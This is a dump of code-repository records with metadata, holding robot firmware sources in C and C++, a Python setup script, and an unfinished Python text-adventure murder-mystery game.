score;\n}\n"
},
{
"alpha_fraction": 0.6867815852165222,
"alphanum_fraction": 0.6910919547080994,
"avg_line_length": 30.636363983154297,
"blob_id": "e8375e5ca2efaf0e5ddf8aed4441288771a5ca1e",
"content_id": "39d4335838d24d16fe4903bfaecd6d72952add9a",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 696,
"license_type": "permissive",
"max_line_length": 95,
"num_lines": 22,
"path": "/eurobot/arm-simulator/setup.py",
"repo_name": "SnaKyEyeS/robot-software",
"src_encoding": "UTF-8",
"text": "from setuptools import setup, find_packages\n\n# read the contents of the README\nfrom os import path\n\nthis_directory = path.abspath(path.dirname(__file__))\nwith open(path.join(this_directory, \"README.md\"), encoding=\"utf-8\") as f:\n long_description = f.read()\n\nsetup(\n name=\"arm_simulator\",\n version=0.1,\n description=\"Simulating robot arms using Hamiltonian dynamics & automatic differentiation\",\n long_description=long_description,\n long_description_content_type=\"text/markdown\",\n author=\"Club Vaudois de Robotique Autonome\",\n author_email=\"[email protected]\",\n url=\"http://cvra.ch\",\n license=\"BSD\",\n packages=find_packages(exclude=[\"contrib\", \"docs\", \"tests*\"]),\n install_requires=[\"autograd\",],\n)\n"
},
{
"alpha_fraction": 0.6642027497291565,
"alphanum_fraction": 0.6684266328811646,
"avg_line_length": 21.547618865966797,
"blob_id": "41e85bfcfaac72c2cc74579f6d8962eae6f53c73",
"content_id": "2060442f2b36074e2fab56777b5521bc06890f8f",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "C++",
"length_bytes": 947,
"license_type": "permissive",
"max_line_length": 79,
"num_lines": 42,
"path": "/master-firmware/src/gui.cpp",
"repo_name": "SnaKyEyeS/robot-software",
"src_encoding": "UTF-8",
"text": "#include <thread>\n#include \"gui.h\"\n#include <string.h>\n#include <stdio.h>\n#include <gfx.h>\n#include \"gui/Menu.h\"\n#include \"gui/PositionPage.h\"\n#include \"gui/MovePage.h\"\n#include \"gui/MenuPage.h\"\n#include \"gui/ScorePage.h\"\n\nstatic void gui_thread()\n{\n gfxInit();\n gwinSetDefaultStyle(&WhiteWidgetStyle, GFXOFF);\n gwinSetDefaultFont(gdispOpenFont(\"DejaVuSans32\"));\n gdispClear(GFX_SILVER);\n gwinSetDefaultBgColor(GFX_SILVER);\n gdispSetOrientation(gOrientation90);\n\n WARNING(\"GUI init done\");\n\n Menu m;\n PositionPage base_position_page;\n MovePage base_move_page;\n ScorePage score_page;\n auto base_menu = MenuPage(m, \"Base\", &base_position_page, &base_move_page);\n auto root_page = MenuPage(m, \"Robot\", &base_menu, &score_page);\n\n m.enter_page(&root_page);\n m.enter_page(&score_page);\n m.event_loop();\n\n while (true) {\n }\n}\n\nvoid gui_start()\n{\n std::thread thd(gui_thread);\n thd.detach();\n}\n"
},
{
"alpha_fraction": 0.6490283012390137,
"alphanum_fraction": 0.6513696908950806,
"avg_line_length": 29.949275970458984,
"blob_id": "264c07c90937f6f3d3e1d3fbc4d9ac33f92a1473",
"content_id": "ae23703b4942d27027c822d811217237762dd39e",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "C++",
"length_bytes": 4271,
"license_type": "permissive",
"max_line_length": 109,
"num_lines": 138,
"path": "/master-firmware/src/control_panel.cpp",
"repo_name": "SnaKyEyeS/robot-software",
"src_encoding": "UTF-8",
"text": "#include <absl/flags/flag.h>\n#include <error/error.h>\n#include \"control_panel.h\"\n#include <unordered_map>\n#include <string>\n#include <cstdio>\n#include <cerrno>\n\nABSL_FLAG(std::string, led_ready_path, \"/sys/class/leds/ready\", \"Path in sysfs used to control LED_READY.\");\nABSL_FLAG(std::string, led_debug_path, \"/sys/class/leds/debug\", \"Path in sysfs used to control LED_DEBUG.\");\nABSL_FLAG(std::string, led_error_path, \"/sys/class/leds/error\", \"Path in sysfs used to control LED_ERROR.\");\nABSL_FLAG(std::string, led_power_path, \"/sys/class/leds/power\", \"Path in sysfs used to control LED_POWER.\");\nABSL_FLAG(std::string, led_pc_path, \"/sys/class/leds/pc\", \"Path in sysfs used to control LED_PC.\");\nABSL_FLAG(std::string, led_bus_path, \"/sys/class/leds/bus\", \"Path in sysfs used to control LED_BUS.\");\n// TODO: Support for RGB led\n\nstruct LedInfo {\n FILE* brightness_file = nullptr;\n int max_brightness = 0;\n bool out_status = false;\n};\n\nstd::unordered_map<enum control_panel_output, LedInfo> led_infos;\n\nconst char* control_panel_input[] = {\n \"BUTTON_YELLOW\",\n \"BUTTON_GREEN\",\n \"STARTER\",\n};\n\nconst char* control_panel_output[] = {\n \"LED_READY\",\n \"LED_DEBUG\",\n \"LED_ERROR\",\n \"LED_POWER\",\n \"LED_PC\",\n \"LED_BUS\",\n \"LED_YELLOW\",\n \"LED_GREEN\",\n};\n\nstatic void set_output(enum control_panel_output out, bool value)\n{\n auto led_info = led_infos.find(out);\n\n DEBUG(\"seting %s to %d\", control_panel_output[out], value);\n\n if (led_info == led_infos.end()) {\n WARNING(\"can not set output %s\", control_panel_output[out]);\n return;\n }\n\n std::string msg = std::to_string(value * led_info->second.max_brightness);\n fwrite(msg.c_str(), msg.length(), 1, led_info->second.brightness_file);\n fflush(led_info->second.brightness_file);\n DEBUG(\"writing '%s' to out %d\", msg.c_str(), out);\n\n led_info->second.out_status = value;\n}\n\nstatic void open_led(enum control_panel_output led_num, std::string path)\n{\n FILE* f;\n LedInfo led_info;\n\n DEBUG(\"output %d is at %s\", led_num, path.c_str());\n\n // First, get the maximum brightness level for this LED\n std::string max_brightness_path = path + \"/max_brightness\";\n f = fopen(max_brightness_path.c_str(), \"r\");\n if (f == nullptr) {\n WARNING(\"could not open '%s' for led %d: %s\", max_brightness_path.c_str(), led_num, strerror(errno));\n return;\n }\n\n fscanf(f, \"%d\", &led_info.max_brightness);\n\n // Then, open the control file for this LED\n std::string brightness_path = path + \"/brightness\";\n led_info.brightness_file = fopen(brightness_path.c_str(), \"w\");\n\n if (led_info.brightness_file == nullptr) {\n WARNING(\"could not open '%s' for led %d: %s\", brightness_path.c_str(), led_num, strerror(errno));\n return;\n }\n\n // keep the file descriptor cached around\n led_infos[led_num] = led_info;\n\n // Turn off all LEDs by default\n set_output(led_num, false);\n\n DEBUG(\"opened %s succesfully\", control_panel_output[led_num]);\n}\n\nvoid control_panel_init(bool is_active_high)\n{\n (void)is_active_high;\n open_led(LED_READY, absl::GetFlag(FLAGS_led_ready_path));\n open_led(LED_DEBUG, absl::GetFlag(FLAGS_led_debug_path));\n open_led(LED_ERROR, absl::GetFlag(FLAGS_led_error_path));\n open_led(LED_POWER, absl::GetFlag(FLAGS_led_power_path));\n open_led(LED_PC, absl::GetFlag(FLAGS_led_pc_path));\n open_led(LED_BUS, absl::GetFlag(FLAGS_led_bus_path));\n}\n\nbool control_panel_read(enum control_panel_input in)\n{\n WARNING_EVERY_N(100, \"%s(%s) not implemented 
yet.\", __FUNCTION__, control_panel_input[in]);\n return false;\n}\n\nbool control_panel_button_is_pressed(enum control_panel_input in)\n{\n WARNING_EVERY_N(100, \"%s(%s) not implemented yet.\", __FUNCTION__, control_panel_input[in]);\n return false;\n}\n\nvoid control_panel_set(enum control_panel_output out)\n{\n set_output(out, true);\n}\n\nvoid control_panel_clear(enum control_panel_output out)\n{\n set_output(out, false);\n}\n\nvoid control_panel_toggle(enum control_panel_output out)\n{\n auto led = led_infos.find(out);\n if (led == led_infos.end()) {\n WARNING_EVERY_N(10, \"could not read back state for %s\", control_panel_output[out]);\n return;\n }\n\n set_output(out, !led->second.out_status);\n}\n"
},
{
"alpha_fraction": 0.5260977745056152,
"alphanum_fraction": 0.5708367824554443,
"avg_line_length": 22.211538314819336,
"blob_id": "19bb0078c8c71058be62c474682fe54e8ac236a9",
"content_id": "47614e018363936237c5d1901f179629cb904a0b",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "C",
"length_bytes": 1207,
"license_type": "permissive",
"max_line_length": 78,
"num_lines": 52,
"path": "/master-firmware/src/unix_timestamp.c",
"repo_name": "SnaKyEyeS/robot-software",
"src_encoding": "UTF-8",
"text": "#include <error/error.h>\n#include \"unix_timestamp.h\"\n\nstatic unix_timestamp_t unix_reference = {.s = 0, .us = 0};\nstatic int32_t local_reference = 0;\n\nint32_t timestamp_unix_to_local_us(unix_timestamp_t ts)\n{\n ts.s -= unix_reference.s;\n ts.us -= unix_reference.us;\n return ts.s * 1000000 + ts.us + local_reference;\n}\n\nunix_timestamp_t timestamp_local_us_to_unix(int32_t ts)\n{\n unix_timestamp_t result;\n\n ts -= local_reference;\n result.s = ts / 1000000 + unix_reference.s;\n result.us = ts % 1000000 + unix_reference.us;\n\n if (result.us >= 1000000) {\n result.s += 1;\n result.us -= 1000000;\n }\n\n return result;\n}\n\nvoid timestamp_set_reference(unix_timestamp_t unix_ts, int32_t local_ts)\n{\n DEBUG(\"NTP time update: %d is: %d.%06d\", local_ts, unix_ts.s, unix_ts.us);\n unix_reference = unix_ts;\n local_reference = local_ts;\n}\n\nint timestamp_unix_compare(unix_timestamp_t a, unix_timestamp_t b)\n{\n if (a.s < b.s) {\n return -1;\n } else if (a.s == b.s) {\n if (a.us < b.us) {\n return -1;\n } else if (a.us == b.us) {\n return 0;\n } else {\n return 1;\n }\n } else {\n return 1;\n }\n}\n"
},
{
"alpha_fraction": 0.6812499761581421,
"alphanum_fraction": 0.6812499761581421,
"avg_line_length": 10.428571701049805,
"blob_id": "f387887827dd85c37cf4734ef995d09b07047c08",
"content_id": "9063a331df1c1f4e2802e8bb7c01fc258ff56e0c",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "C",
"length_bytes": 160,
"license_type": "permissive",
"max_line_length": 26,
"num_lines": 14,
"path": "/master-firmware/src/strategy.h",
"repo_name": "SnaKyEyeS/robot-software",
"src_encoding": "UTF-8",
"text": "#ifndef STRATEGY_H\n#define STRATEGY_H\n\n#ifdef __cplusplus\nextern \"C\" {\n#endif\n\nvoid strategy_play_game();\n\n#ifdef __cplusplus\n}\n#endif\n\n#endif /* STRATEGY_H */\n"
}
] | 21 |
SumanjitGill/ChooseYourAdventureStory
|
https://github.com/SumanjitGill/ChooseYourAdventureStory
|
fb4d8619c6fd3a1be9fbab21d4f2d9054e19237b
|
cf15a56af2bccae4982a4ca0bfccccc6631311c5
|
e0a8024584e56bc8b7b961e472b7096a5f606865
|
refs/heads/master
| 2021-01-17T15:15:51.595285 | 2016-05-17T17:11:21 | 2016-05-17T17:11:21 | 53,967,748 | 0 | 0 | null | null | null | null | null |
[
{
"alpha_fraction": 0.634540319442749,
"alphanum_fraction": 0.6397899985313416,
"avg_line_length": 41.77735137939453,
"blob_id": "98b3cb855a3f85d2696eeb768ef03de77f20c046",
"content_id": "e6880028b5db230f61c639917c5fe94f41dd1fef",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 22301,
"license_type": "no_license",
"max_line_length": 618,
"num_lines": 521,
"path": "/CS10-SumanjitGill-ChooseYourOwnAdventure.py",
"repo_name": "SumanjitGill/ChooseYourAdventureStory",
"src_encoding": "UTF-8",
"text": "# -*- coding: utf-8 -*-\n#WARNING: GAME UNFINISHED\n\nimport sys\nimport random\n\nclass Inventory:\n def __init__(self):\n self.inventory = []\n self.inventory_two = []\n \n #def view inventory (inventory_two)\n def view_inventory(self):\n print self.inventory_two\n #def examine item (inventory)\n def examine_item(self, obj):\n if obj not in self.inventory:\n print 'You can\\'t examine this object because it is not in your\\\n inventory. Try an object you have.'\n else:\n print obj.name\n print obj.description\n \nuser_inventory = Inventory()\n\n#-------------------------------------------------------------------------------\n \nclass Item:\n def __init__(self, name, description):\n self.name = name\n self.description = description\n \n def examine(self):\n print self.name\n print self.description\n \n def pick_up(self, Inventory):\n Inventory.inventory.append(Item)\n Inventory.inventory_two.append(self.name)\n print 'You have picked up: %s.' %self.name\n \n def give_item(self):\n Inventory.inventory.remove(Item)\n Inventory.inventory_two.remove(self.name)\n\ncell_phone = Item('Nicole\\'s Cell Phone', 'There is a passcode on this phone but\\\nthere must be some good evidence on here; Why not take it to Gabi?')\n\nteacup = Item('Teacup', 'This broken cup can be taken to Gabi. Nicole drinks tea\\\nevery morning... any ideas?')\n\nbody = Item('Nicole\\'s Body', 'There are no trauma signs; Could she have been killed\\\nwith poison?')\n\npaperwork = Item('Financial Paperwork', 'This paperwork lets you know that Sakshi\\\nand Nicole were business rivals.')\n\n#To be updated later\n\ntea_grounds = Item('Tea Grounds', '')\n\nmorphine_capsules = Item('Morphine Capsules', '')\n\nchair = Item('Chair', '')\n\npen = Item('Sakshi\\'s Pen', '')\n\nwater_glass = Item('Sakshi\\'s Glass', '')\n\nwater_glass_2 = Item('','')\n\nvase = Item('','')\n\nfridge = Item('','')\n\nvase_2 = Item('','')\n\npen_2 = Item('','')\n\ndesk = Item('','')\n\nwrapper = Item('','')\n\nclarinet = Item('','')\n\nbench = Item('','')\n\nnews_clipping = Item('','')\n\npill_bottle = Item('','')\n\n#-------------------------------------------------------------------------------\n\n#Storyline\nclass Character():\n def __init__(self, name, full_name, age, status, background, location):\n self.name = name\n self.full_name = full_name\n self.age = age\n self.status = status\n self.background = background\n self.location = location\n \n def stats(self):\n print self.full_name\n print self.age\n print self.status\n print self.background\n'''\n \n def locate(character):\n print character.name+ 'is located in: %s' %character.location\n '''\n \nCaroline = Character('Caroline','Karolina \"Caroline\" Ativa', 22, 'Alive', 'Caroline is a dedicated police officer and takes her tasks seriously.', 'You are her... 
So wherever you are that\\'s where she is.')\nLiam = Character('Liam','Liam Youngblood', 23, 'Alive', 'Liam is your fellow officer and is very charasmatic and likes to make light of situations to keep your spirits up.', 'He\\'s always by your side.')\nGabriela = Character('Gabi','Gabriella Solis',18, 'Alive', 'Gabi is a technology and science geek and loves to invent new things; she\\'s the scientific aide to your father\\'s police department.', 'She\\'s found in the lab at the police office.')\nAndres = Character('Andres','Andres Leal', 30, 'Alive; Suspect', 'Andres is a calm doctor who loves to play his clarinet.', 'He\\'s found in the garden.')\nBree = Character('Bree','Breanna \"Bree\" Scholtz', 35, 'Alive; Suspect', 'She works as Leng\\'s maid around the mansion.', 'She\\'s found in the living room.')\nNicole = Character('Nicole','Nicole Laurenya', 31, 'Dead; Victim', 'She was a rich heiress of Twilight Grove.', 'Her corpse is found in her bedroom.')\nLiev = Character('Liev','Liev Ativa', 45, 'Alive', 'He is your father and the police chief who assigned you to this investigation.', 'He is found in the police office.')\nSakshi = Character('Sakshi','Sakshi Goenka', 32, 'Alive; Suspect','Sakshi is a business tycoon and is Leng\\'s girlfriend.', 'She is found in the study.')\nLeng = Character('Leng','Leng Li', 33, 'Alive; Suspect', 'He is a renowned chef and is Sakshi\\'s lover.', 'He is found in the kitchen.')\n\n#-------------------------------------------------------------------------------\n\n#def help():\n# user_q = raw_input('What do you need help with?\\n')\n\n#-------------------------------------------------------------------------------\n \n#For Version 2: \n'''class Notebook:\n def __init__(self):\n self.notebook = []\n \n def write_in_notebook(self):\n user_note = raw_input('What would you like to write in your notebook?')\n self.notebook.append(user_note)\n \n def show_entry_amount(self):\n if len(self.notebook) ==1:\n print 'You have 1 entry.'\n elif len(self.notebook) ==0:\n print 'You don\\'t have any entries.'\n else:\n print 'You have', len(self.notebook),'entries.'\n \n def read_entry(self):\n for i in enumerate(self.notebook):\n print i\n user_entry_choice = raw_input('Which entry would you like to read?')\n try:\n path = [int(user_entry_choice)]\n print self.notebook[path]\n except:\n print 'Invalid Number. Try a valid number.'\n \nyour_notebook = Notebook()\n#4691 E Harvard Ave Fresno, CA 93703-2075\n'''\n\n#-------------------------------------------------------------------------------\n\n#class Dialogue:\n # def __init__(self, dialogue):\n # self.dialogue = dialogue\n # \n #def say(self,char):\n # print char.name+':','\"'+self.dialogue+'\"'\n \nscene_1 = 'Chief: Chief Ativa speaking. Yes, sir. Yes, sir. I understand. Yes, sir, I will make sure it is taken care of.\\n\\\nThe Chief hangs up the phone and looks at a picture with him and his daughter (you) on the day she (you) graduated from the police academy.\\n\\\nYou are sitting outside at your desk with paperwork, you partner Liam talking your ear off.\\n\\\nLiam: And that\\'s when I said, I don\\'t care how much money he has. It\\'s all about how his -- \\n\\\nChief: Ativa and Youngblood, get in here.\\n\\\nLiam: Pants. And yes, sir! 
Your dad seems grumpy.\\n\\\nYou: Probably saw your face too early in the morning.\\n\\\nLiam: Ouch, that hurts.\\n\\\nYou both enter the Chief\\'s office.\\n\\\nChief: There\\'s been a highly suspicious death.\\n\\\nLiam: Naturally, we are the homicide division.\\n\\\nYou shoot Liam a look, fighting the urge to roll your eyes, which the Chief does do.\\n\\\nChief: Youngblood, I don\\'t want to hear another word until I am done briefing you. There\\'s been a death in Twilight Grove.\\n\\\nLiam whistles, getting another irritated look from the Chief. You know what Liam meant. Twilight Grove is a very affluent neighborhood.\\n\\\nChief: As you can understand, it\\'s a high profile case and the Mayor is concerned. The crime scene is quite isolated so it has been kept quiet. \\n\\\nI want both of you to head the case and wrap it up. Come talk to me as soon as you\\'ve solved it.\\n\\\nYou exit the Chief\\'s office with Liam. What would you like to do:\\n\\\n\t- police office\\n\\\n\t- mansion\\n\\\n\t- lab'\n\nchief = '\\nChief: What are you waiting for? Finish up the case!'\n\ngabi = '\\nGabi: No evidence, no entry, no Gabi. Come back later you lovable bozos.'\n\nscene_2 = '\\nLiam: That is one huge—\\n\\\nYou: According to the case files, it belongs to a guy named Leng Li. He\\'s a renowned chef.\\n\\\nLiam: If he\\'s so rich, why can\\'t he buy a trash can? There\\'s so much junk around here.\\n\\\nYou: Oh, right, the garbage strike. Did you read about how -- \\n\\\nLiam: No, I didn\\'t. Well, I can take solace in the fact that my house is cleaner than a rich guy\\'s. \\n\\\nYou: And there\\'s no dead body in yours. I hope.'\n\nscene_3 = '\\nLiam: Pretty girl. At least she didn\\'t die in the \"living\" room, eh?\\n\\\nYou: This is Nicole Laurenya, a rich heiress well-known for her social life.\\n\\\nLiam: Just going to ignore my joke?\\n\\\nYou: Yup.'\n\nexamine = '\\nYou: I don\\'t see any signs of trauma and I hardly think it\\'s natural causes. It could be poison…\\n\\\nLiam: The killer\\'s probably a woman then. Poison is usually used by women.\\n\\\nYou: Didn\\'t you say you would kill someone with cyanide if you wanted to make a clean getaway?\\n\\\nLiam: I\\'m special. Anyways, let\\'s let the coroner take a look. Gabriella will tell us more.'\n\ncup = '\\nYou: Gabriella can also tell us more about this.\\n\\\nLiam: Now I\\'m thirsty.\\n\\\nYou: You want a sip?\\n\\\nLiam: Ha, ha, hilarious.'\n\nphone = 'You: Found something.\\n\\\nLiam: The victim\\'s cell phone. Nice.\\n\\\nYou: It has a passcode but I\\'m sure we can figure it out later.'\n\nsakshi_1 = 'You enter the study to see a woman sitting at the desk and writing with a fancy pen, her expression clearly upset. \\n\\\nYou: Hello. I am Detective Ativa and this is my partner, Detective Youngblood. We need to ask you some questions. What is your name?\\n\\\nSakshi: I\\'m Sakshi Goenka.\\n\\\nLiam: The business tycoon?\\n\\\nSakshi: The very same.\\n\\\nLiam: And how were you related to the victim?\\n\\\nSakshi: Her name was Nicole. You can at least say her name. And she was my best friend. \\n\\\nYou: I\\'m so sorry for your loss. Can you tell us what happened?\\n\\\nSakshi: I don’t know. My boyfriend, Leng, invited our friends over for a few days so we can spend some time together and…all I know is Nicole was alive last night and this morning, when she didn\\'t come down for breakfast, the maid went to check on her and she was dead. Just like that. She shouldn\\'t be. 
Nicole was the sweetest, funniest, most fun person you could know.\\n\\\nYou: Thank you for your time. We\\'ll be back later if we have more questions.'\n\nleng_1 = '\\nYou enter the kitchen to see a man pouring himself a glass of water, looking lost.\\n\\\nYou: Hello. I am Detective Ativa and this is my partner, Detective Youngblood. We need to ask you some questions. What is your name?\\n\\\nLeng: My name is Leng, Leng Li. \\n\\\nLiam: And how were you related to the victim?\\n\\\nLeng: Nicole is, was, one of my best friends. She, my girlfriend Sakshi, Andres, and I grew up together.\\n\\\nYou: I\\'m so sorry for your loss. Can you tell us what happened?\\n\\\nLeng: All of us finally had some time off and so I invited everyone to stay for a few days. I was looking forward to it. I can\\'t believe the nightmare it has become. Everything was so normal and nostalgic. Nicole was having a blast the entire time, we all were. This morning…we all came for breakfast but Nicole wasn\\'t there. I told Bree, my maid, to call her. She screamed so loud and we all ran up there and saw…she was dead. I still can\\'t believe she\\'s really gone.\\n\\\nYou: Thank you for your time. We\\'ll be back later if we have more questions.'\n\nbree_1 = '\\nYou enter the living room to see a woman nervously arranging a vase of flowers, her face disturbed.\\n\\\nYou: Hello. I am Detective Ativa and this is my partner, Detective Youngblood. We need to ask you some questions. What is your name?\\n\\\nBree: My name is Bree Scholtz.\\n\\\nLiam: And how were you related to the victim?\\n\\\nBree: I\\'m not. I mean, I\\'m Mr. Li\\'s maid so I only knew Ms. Nicole in passing.\\n\\\nYou: I understand. Can you tell us what happened? You found the body, correct?\\n\\\nBree: Yes, it was horrible. Last night, Ms. Nicole had asked me to bring her a cup of the special blend that Mr. Li had set aside for her in the morning at precisely 8 a.m. Unfortunately, I didn\\'t get up there until about 8:30 a.m. and Ms. Nicole was in the shower. I helped Mr. Li in the kitchen until breakfast was to be served. Mr. Li sent me upstairs when Ms. Nicole didn\\'t come down. I went to her room and opened the door to see her lying on the ground, completely still. I screamed and they all came running up. I don\\'t remember who said she was dead; I was in shock. It was a truly horrifying experience.\\n\\\nLiam: So you were also the last person to see the victim alive?\\n\\\nBree: I suppose so. Ms. Nicole was in the shower when I went there so I never saw her exactly.\\n\\\nYou: Thank you for your time. We\\'ll be back later if we have more questions.'\n\nandres_1 = '\\nYou enter the garden to see a man sitting in the garden, mournfully playing a tune on his clarinet. \\n\\\nYou: Hello. I am Detective Ativa and this is my partner, Detective Youngblood. We need to ask you some questions. What is your name?\\n\\\nAndres: I\\'m Dr. Andres Leal. \\n\\\nLiam: And how were you related to the victim?\\n\\\nAndres: Nicole was one of my closest friends. Sakshi, Leng, Nicole, and I have been best friends since as long as I can remember.\\n\\\nYou: I\\'m so sorry for your loss. Can you tell us what happened?\\n\\\nAndres: Leng had invited all of us for the week and it was going great. It was nice to all hang out again. This morning, the maid went up to call Nicole down for breakfast and she just started screaming. We all ran up there and Nicole was lying on the floor. 
I went over to her and checked if there was a pulse but I couldn\\'t find one and she wasn\\'t breathing. I tried to do CPR but…we were too late.\\n\\\nYou: Thank you for your time. We\\'ll be back later if we have more questions.'\n\ngabi_2 = '\\nYou enter the lab to see Gabi typing quickly on a computer.\\n\\\nYou: Hey, Gabriella.\\n\\\nGabriella: Karolina, Liam, my two fav idiots.\\n\\\nLiam: What\\'s the good word, Gabi?\\n\\\nGabriella: First, let me say thank you for such a sweet case. I mean, Twilight Grove? Money City!\\n\\\nLiam: You\\'re telling me. The mansion is so huge, I keep getting confused which room is where.\\n\\\nYou: *clear throat* Guys, focus. \\n\\\nGabriella: Right, you\\'re right. I\\'m still waiting on the coroner to send me the full report but what I can tell you is that this tea cup contains poison.\\n\\\nLiam: What kind of poison?\\n\\\nGabriella: I don\\'t know yet. And before you ask, I am working on it and the cellphone. You\\'ll have to come back later. Why don\\'t you two go back and snoop around. Make yourselves useful and bring some more goodies!'\n\ngabi_3 = '\\nGabi: Got more? No? I\\'m not a miracle worker; bring me something I can work my magic on.'\n\n\n\n#-------------------------------------------------------------------------------\n\n#Rooms\n\n#Have three parameters in __init__ for the item name\n#Refer to it as you did with dialogue\n \nclass Room:\n def __init__(self, name, description, item, item_two, item_three, item_four):\n self.name = name\n self.description = description\n self.item = item\n self.item_two = item_two\n self.item_three = item_three\n self.item_four = item_four\n \n def see_item(self, cosa):\n print cosa.description\n \npolice_office = Room('Police Chief Ativa\\'s Office', 'This is your father\\'s police \\\noffice. He is sitting at his desk doing some paperwork.', None, None, None, None)\n\nstudy = Room('The Study', 'This study is where Sakshi stays.', paperwork, chair, pen, water_glass)\n\ngarden = Room('Garden', 'In this garden is Andres.', wrapper, clarinet, bench, news_clipping)\n\nliving_room = Room('Living Room', 'This room is where Bree resides.', vase_2, pen_2, desk, None)\n\nkitchen = Room('Kitchen', 'This kitchen is where Leng is located.', tea_grounds, water_glass_2, vase, fridge)\n\nbedroom = Room('Nicole\\'s Bedroom', 'This is the crime scene. A woman\\'s body lies \\\nnext to the bed, a splattered tea cup by her side. You may examine the body, pick up the teacup, \\\nand look under the bed.', cell_phone, teacup, body, morphine_capsules)\n\nlab = Room('Gabi\\'s Lab', 'This lab is where you can always find Gabi. 
Come here \\\nwhen you need some evidence examined!', None, None, None, None)\n\nfront_yard = Room('Mansion\\'s Front Yard', 'A lush green lawn spreads like a blanket in front of a massive and ornately structured mansion, the view only marred by splashes of trash.\\n\\\nFrom here you can go to:\\n\\\n - study\\n\\\n - kitchen\\n\\\n - bedroom\\n\\\n - living room\\n\\\n - garden\\n\\\n - police office\\n\\\n - lab', pill_bottle, None, None, None)\n\nglobal node \nnode = police_office \n\n#Initiators\nstart = 0 \npill_bottle = 0\ncase_solved = False \nwarning = 0\nconversation = 0\nsakshi_one = 0\nleng_one = 0\nbree_one = 0\nandres_one = 0\narrival = 0\nbedroom_arrival = 0\n \nwhile True:\n while warning == 0:\n print('\\nDisclaimer: This game is not yet completely finished.\\n\\n')\n warning +=1\n print('\\n')\n print node.name\n print node.description\n \n if node == police_office and start == 0:\n print('\\n')\n print(scene_1)\n start +=1\n \n if node == police_office and case_solved == False:\n print(chief)\n \n if node == lab and len(user_inventory.inventory) == 0:\n print(gabi)\n \n if node == lab and len(user_inventory.inventory) == 1 and conversation <=4:\n print('\\nGabi: There\\'s another piece of evidence lurking around in that house. Go forth!')\n \n if node == front_yard and arrival == 0:\n print(scene_2)\n arrival+=1\n \n if node == bedroom and bedroom_arrival == 0:\n print(scene_3)\n bedroom_arrival+=1\n \n if node == study and sakshi_one == 0:\n print(sakshi_1)\n sakshi_one+=1\n conversation+=1\n \n if node == garden and andres_one == 0:\n print(andres_1)\n andres_one+=1\n conversation+=1\n \n if node == kitchen and leng_one == 0:\n print(leng_1)\n leng_one+=1\n conversation+=1\n \n if node == living_room and bree_one == 0:\n print(bree_1)\n bree_one+=1\n conversation +=1\n \n if conversation == 4 and len(user_inventory.inventory) == 2 and node == lab:\n print(gabi_2)\n conversation +=1\n print('\\nThat\\'s all for now folks! No more sleuthing around yet. 
Stay tuned for the final product!')\n \n user_command = raw_input('> ')\n if user_command in ['q', 'quit', 'exit']:\n sys.exit(0)\n elif user_command == 'police office':\n node = police_office\n elif user_command == 'study':\n node = study\n elif user_command == 'garden':\n node = garden\n elif user_command == 'living room':\n node = living_room\n elif user_command == 'kitchen':\n node = kitchen\n elif user_command == 'bedroom':\n node = bedroom\n elif user_command == 'lab':\n node = lab\n elif user_command == 'mansion':\n node = front_yard\n elif user_command == 'examine body':\n print(examine)\n elif user_command == 'pick up paperwork' and node == study:\n paperwork.pick_up(user_inventory)\n elif user_command == 'pick up chair' and node == study:\n chair.pick_up(user_inventory)\n elif user_command == 'pick up glass' and node == study:\n water_glass.pick_up(user_inventory)\n elif user_command == 'pick up pen' and node == study:\n pen.pick_up(user_inventory)\n elif user_command == 'pick up cell phone' and node == bedroom:\n cell_phone.pick_up(user_inventory)\n elif user_command == 'look under bed' and node == bedroom:\n print(phone)\n elif user_command == 'pick up teacup' and node == bedroom:\n teacup.pick_up(user_inventory)\n print(cup)\n elif user_command == 'pick up morphine capsules' and node == bedroom:\n morphine_capsules.pick_up(user_inventory)\n elif user_command == 'check trash' and node == front_yard:\n print \n elif user_command == 'pick up pill bottle' and node == front_yard:\n pill_bottle.pick_up(user_inventory)\n pill_bottle+=1\n elif user_command == 'pick up vase' and node == living_room:\n vase_2.pick_up(user_inventory)\n elif user_command == 'pick up pen' and node == living_room:\n pen_2.pick_up(user_inventory)\n elif user_command == 'pick up desk' and node == living_room:\n desk.pick_up(user_inventory)\n elif user_command == 'pick up wrapper' and node == garden:\n wrapper.pick_up(user_inventory)\n elif user_command == 'pick up clarinet' and node == garden:\n clarinet.pick_up(user_inventory)\n elif user_command == 'pick up bench' and node == garden:\n bench.pick_up(user_inventory)\n elif user_command == 'pick up news clipping' and node == garden:\n news_clipping.pick_up(user_inventory)\n \n\n#-------------------------------------------------------------------------------\n \n#Do dialogue in order this by continously calling the dialogue 'say' function\n#Progress stories this way\n \n#Win Conditions as a class to make sure that the person accomplished everything \n#before winning\n#Series of red flags/conditionals to make sure that the tasks are completed \n \n\n\n#Hangman\n\n#Numerical Riddle (1982)\n\n#Riddle\n\n#Hangman\n\n#Riddle\n\n#Numerical Riddle (Passcode = (0129))\n #- Tells you which digits you got correct and which you didn't\n #- \n \n#-------------------------------------------------------------------------------\n \n'''\n#Setting up variables to be called on later\nlife = 5\nbank = [\"zero one twenty nine\"]\nword = random.choice(bank)\nletters_left = list(set(word)) #creating a list of letters in word\nif ' ' in word:\n letters_left.remove(' ') #removing the space if there is one\n \nuser_guesses = [] #More variables\nwrong_answers = 0\nhidden_phrase = []\nfoo = list(word) \nprint (\"You have five chances right now.\")\nwhile life > 0: #The dreaded while loop\n \n for letter in word: \n hidden_phrase = [] \n if letter in user_guesses:\n print letter,\n elif letter == ' ':\n print letter,\n else:\n print ('_'),\n \n \n current_guess = raw_input(\"Guess a 
letter: \") #This takes in raw input\n user_guesses.append(current_guess)\n if current_guess in word: #If guess in word, remove from letters_left\n letters_left.remove(current_guess) \n #print letters_left\n print user_guesses #Prints guesses so far\n if current_guess not in word: #If you guess incorrectly\n life -= 1\n wrong_answers += 1\n print (\"Your life count: \") + str(life)\n \n if len(letters_left) == 0:\n gaby.say()\n '''\n"
},
